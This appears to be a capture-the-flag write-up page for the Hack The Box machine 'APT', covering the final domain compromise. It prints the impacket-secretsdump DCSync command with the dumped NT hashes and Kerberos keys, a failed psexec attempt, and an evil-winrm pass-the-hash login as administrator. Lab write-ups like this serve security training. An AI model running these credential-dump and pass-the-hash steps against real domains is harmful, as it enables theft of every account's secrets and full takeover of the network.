InfoSec LAB

APT_Privilege_Escalation

Created: 2 min read

Hashdump

After successfully conducting the NTLM relay attack and cracking the captured Net-NTLMv1 hash of the machine account, APT$, I have validated the cracked NT hash of the APT$ account, generating a TGT in the process

Leveraging the TGT, I should be able to dump the entire domain hashing with the DCSync Attack as the APT$ account is essentially the DC host itself.

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=APT\$@apt.htb.local.ccache impacket-secretsdump 'htb.local/@apt.htb.local' -no-pass -k -dc-ip $IPv6       
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
apt$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
apt$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
apt$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
apt$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

Domain Level Compromise

Shell Drop

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=APT\$@apt.htb.local.ccache impacket-psexec 'htb.local/@apt.htb.local' -no-pass -k -dc-ip $IPv6
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on apt.htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

impacket-psexec is not possible since there is no C$ share as enumerated earlier However, I could just use the administrator’s NT hash to authenticate to the WinRM server to start a PowerShell session

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ evil-winrm -i apt.htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
apt
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::240
   IPv6 Address. . . . . . . . . . . : dead:beef::44d8:93c7:dd88:c522
   IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
   Link-local IPv6 Address . . . . . : fe80::44d8:93c7:dd88:c522%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.213
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:d784%5
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks